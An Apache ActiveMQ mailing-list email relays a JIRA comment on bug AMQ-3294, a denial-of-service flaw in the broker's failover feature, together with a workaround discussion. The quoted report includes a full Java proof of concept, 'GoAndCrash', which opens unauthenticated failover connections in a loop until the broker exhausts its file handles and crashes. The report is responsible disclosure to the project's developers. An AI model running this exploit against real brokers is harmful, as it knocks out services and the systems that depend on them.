Mailing-List: contact dev-help@activemq.apache.org; run by ezmlm
Precedence: bulk
Reply-To: dev@activemq.apache.org
Date: Wed, 31 Aug 2011 17:48:10 +0000 (UTC)
From: "Luca Carettoni (JIRA)" <jira@apache.org>
To: dev@activemq.apache.org
Message-ID: <26604429.3546.1314812890129.JavaMail.tomcat@hel.zones.apache.org>
In-Reply-To: 
 <5331148.76995.1303497905853.JavaMail.tomcat@hel.zones.apache.org>
Subject: [jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable


    [ https://issues.apache.org/jira/browse/AMQ-3294?page=3Dcom.atlassian.j=
ira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=3D130947=
20#comment-13094720 ]=20

Luca Carettoni commented on AMQ-3294:
-------------------------------------

Gary, thanks for your follow-up!
Haven't tested it yet but it looks indeed as a possible workaround - at lea=
st to avoid a brutal crash.

I've just downloaded the latest stable (5.5.0) and it does not include this=
 configuration option in any of the configuration templates. From the secur=
ity standpoint, it will be great to see this transport option enabled by de=
fault with a reasonable value.

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versi=
ons
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can t=
rigger a Denial of Service condition against the broker service.=20
> In detail, an attacker can issue multiple ActiveMQ openwire connection re=
quests using the following connection string: =E2=80=A8failover:tcp://<IP>:=
61616
> Due to the 'failure' mechanism, all TCP connections remain active even if=
 a valid session is not created.=20
> Please note that no valid credentials have been used.=20
> After a few thousand requests, a "java.net.SocketException: Too many open=
 files" exception is triggered causing the freeze/crash of the broker. Conn=
ected systems may crash as well.=20
> During my test, the attack took around 4 minutes (in a local network) and=
 it is highly reliable. This is most likely an abuse of the 'failover' func=
tionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As bot=
h releases are affected, I assume that this issue is present in other versi=
ons as well. The problem appears in the default configuration as well as wi=
th different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
> public class GoAndCrash {
>     private static String url =3D "failover:tcp://";
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url =3D url.concat(args[0] + ":" + args[1]);
>         int cont =3D 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory =3D new ActiveMQConne=
ctionFactory("invalidUser", "invalidPass", url);
>                 Connection connection =3D connectionFactory.createConnect=
ion();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                //do nothing
>             }
>         }
>     }
> }
> --------------------

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira